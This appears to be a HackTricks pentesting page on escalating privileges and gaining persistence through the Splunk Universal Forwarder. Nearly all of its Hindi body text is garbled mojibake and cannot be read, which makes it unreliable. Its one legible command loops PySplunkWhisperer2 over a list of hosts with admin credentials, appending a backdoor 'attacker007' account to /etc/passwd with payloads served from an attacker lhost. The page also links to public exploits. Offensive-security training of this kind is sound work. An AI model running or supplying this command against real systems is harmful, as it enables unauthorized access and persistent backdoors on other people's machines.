Splunk LPE and Persistence

Support HackTricks

рдпрджрд┐ рдЖрдВрддрд░рд┐рдХ рдпрд╛ рдмрд╛рд╣рд░реА рд░реВрдк рд╕реЗ рдХрд┐рд╕реА рдорд╢реАрди рдХрд╛ рдЧрдгрдирд╛ рдХрд░рддреЗ рд╕рдордп рдЖрдкрдХреЛ Splunk рдЪрд▓рд╛рддреЗ рд╣реБрдП (рдкреЛрд░реНрдЯ 8090) рдорд┐рд▓рддрд╛ рд╣реИ, рдпрджрд┐ рдЖрдкрдХреЛ рдХрд┐рд╕реА рдорд╛рдиреНрдп рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХрд╛ рдкрддрд╛ рд╣реИ рддреЛ рдЖрдк Splunk рд╕реЗрд╡рд╛ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╢реЗрд▓ рдХреЛ рдЙрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ Splunk рдЪрд▓рд╛ рд░рд╣рд╛ рд╣реИред рдпрджрд┐ рд░реВрдЯ рдЗрд╕реЗ рдЪрд▓рд╛ рд░рд╣рд╛ рд╣реИ, рддреЛ рдЖрдк рд░реВрдЯ рддрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВред

рдпрджрд┐ рдЖрдк рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рд░реВрдЯ рд╣реИрдВ рдФрд░ Splunk рд╕реЗрд╡рд╛ рдХреЗрд╡рд▓ рд▓реЛрдХрд▓рд╣реЛрд╕реНрдЯ рдкрд░ рд╕реБрди рдирд╣реАрдВ рд░рд╣реА рд╣реИ, рддреЛ рдЖрдк Splunk рд╕реЗрд╡рд╛ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдлрд╝рд╛рдЗрд▓ рдЪреБрд░рд╛ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдХреНрд░реИрдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдпрд╛ рдЗрд╕рдореЗрдВ рдирдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдЬреЛрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВред рдФрд░ рд╣реЛрд╕реНрдЯ рдкрд░ рд╕реНрдерд┐рд░рддрд╛ рдмрдирд╛рдП рд░рдЦ рд╕рдХрддреЗ рд╣реИрдВред

рдиреАрдЪреЗ рдкрд╣рд▓реЗ рдЪрд┐рддреНрд░ рдореЗрдВ рдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдПрдХ Splunkd рд╡реЗрдм рдкреГрд╖реНрда рдХреИрд╕рд╛ рджрд┐рдЦрддрд╛ рд╣реИред

Splunk рдпреВрдирд┐рд╡рд░реНрд╕рд▓ рдлреЙрд░рд╡рд░реНрдбрд░ рдПрдЬреЗрдВрдЯ рдХрд╛ рд╢реЛрд╖рдг рд╕рд╛рд░рд╛рдВрд╢

рдЕрдзрд┐рдХ рд╡рд┐рд╡рд░рдг рдХреЗ рд▓рд┐рдП рдкреЛрд╕реНрдЯ рджреЗрдЦреЗрдВ https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/ред рдпрд╣ рдХреЗрд╡рд▓ рдПрдХ рд╕рд╛рд░рд╛рдВрд╢ рд╣реИ:

рд╢реЛрд╖рдг рдЕрд╡рд▓реЛрдХрди: Splunk рдпреВрдирд┐рд╡рд░реНрд╕рд▓ рдлреЙрд░рд╡рд░реНрдбрд░ рдПрдЬреЗрдВрдЯ (UF) рдХреЛ рд▓рдХреНрд╖рд┐рдд рдХрд░рдиреЗ рд╡рд╛рд▓рд╛ рдПрдХ рд╢реЛрд╖рдг рдЙрди рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ рдЬрд┐рдирдХреЗ рдкрд╛рд╕ рдПрдЬреЗрдВрдЯ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИ, рдПрдЬреЗрдВрдЯ рдЪрд▓рд╛ рд░рд╣реЗ рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдордирдорд╛рдирд╛ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╕рдВрднрд╛рд╡рд┐рдд рд░реВрдк рд╕реЗ рдкреВрд░реЗ рдиреЗрдЯрд╡рд░реНрдХ рдХреЛ рдЦрддрд░реЗ рдореЗрдВ рдбрд╛рд▓рддрд╛ рд╣реИред

рдореБрдЦреНрдп рдмрд┐рдВрджреБ:

  • UF рдПрдЬреЗрдВрдЯ рдЖрдиреЗ рд╡рд╛рд▓реЗ рдХрдиреЗрдХреНрд╢рдиреЛрдВ рдпрд╛ рдХреЛрдб рдХреА рдкреНрд░рд╛рдорд╛рдгрд┐рдХрддрд╛ рдХреЛ рдорд╛рдиреНрдп рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдпрд╣ рдЕрдирдзрд┐рдХреГрдд рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред

  • рд╕рд╛рдорд╛рдиреНрдп рдкрд╛рд╕рд╡рд░реНрдб рдЕрдзрд┐рдЧреНрд░рд╣рдг рд╡рд┐рдзрд┐рдпреЛрдВ рдореЗрдВ рдЙрдиреНрд╣реЗрдВ рдиреЗрдЯрд╡рд░реНрдХ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдУрдВ, рдлрд╝рд╛рдЗрд▓ рд╢реЗрдпрд░реЛрдВ, рдпрд╛ рдЖрдВрддрд░рд┐рдХ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝реЛрдВ рдореЗрдВ рдвреВрдВрдврдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИред

  • рд╕рдлрд▓ рд╢реЛрд╖рдг рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд┐рдП рдЧрдП рд╣реЛрд╕реНрдЯ рдкрд░ SYSTEM рдпрд╛ рд░реВрдЯ рд╕реНрддрд░ рдХреА рдкрд╣реБрдВрдЪ, рдбреЗрдЯрд╛ рдирд┐рдХрд╛рд╕реА, рдФрд░ рдЖрдЧреЗ рдХреЗ рдиреЗрдЯрд╡рд░реНрдХ рдореЗрдВ рдШреБрд╕рдкреИрда рд╣реЛ рд╕рдХрддреА рд╣реИред

рд╢реЛрд╖рдг рдирд┐рд╖реНрдкрд╛рджрди:

  1. рд╣рдорд▓рд╛рд╡рд░ UF рдПрдЬреЗрдВрдЯ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИред

  2. рдПрдЬреЗрдВрдЯреЛрдВ рдХреЛ рдЖрджреЗрд╢ рдпрд╛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рднреЗрдЬрдиреЗ рдХреЗ рд▓рд┐рдП Splunk API рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред

  3. рд╕рдВрднрд╛рд╡рд┐рдд рдХреНрд░рд┐рдпрд╛рдУрдВ рдореЗрдВ рдлрд╝рд╛рдЗрд▓ рдирд┐рд╖реНрдХрд░реНрд╖рдг, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддрд╛ рд╣реЗрд░рдлреЗрд░, рдФрд░ рд╕рд┐рд╕реНрдЯрдо рдХрд╛ рд╕рдордЭреМрддрд╛ рд╢рд╛рдорд┐рд▓ рд╣реИред

рдкреНрд░рднрд╛рд╡:

  • рдкреНрд░рддреНрдпреЗрдХ рд╣реЛрд╕реНрдЯ рдкрд░ SYSTEM/рд░реВрдЯ рд╕реНрддрд░ рдХреА рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЗ рд╕рд╛рде рдкреВрд░реНрдг рдиреЗрдЯрд╡рд░реНрдХ рд╕рдордЭреМрддрд╛ред

  • рдкрд╣рдЪрд╛рди рд╕реЗ рдмрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рд▓реЙрдЧрд┐рдВрдЧ рдХреЛ рдЕрдХреНрд╖рдо рдХрд░рдиреЗ рдХреА рд╕рдВрднрд╛рд╡рдирд╛ред

  • рдмреИрдХрдбреЛрд░ рдпрд╛ рд░реИрдирд╕рдорд╡реЗрдпрд░ рдХреА рд╕реНрдерд╛рдкрдирд╛ред

рд╢реЛрд╖рдг рдХреЗ рд▓рд┐рдП рдЙрджрд╛рд╣рд░рдг рдЖрджреЗрд╢:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

рдЙрдкрдпреЛрдЧреА рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯреНрд╕:

  • https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2

  • https://www.exploit-db.com/exploits/46238

  • https://www.exploit-db.com/exploits/46487

Splunk рдХреНрд╡реЗрд░реА рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдкреЛрд╕реНрдЯ рджреЗрдЦреЗрдВ https://blog.hrncirik.net/cve-2023-46214-analysis

Support HackTricks

Last updated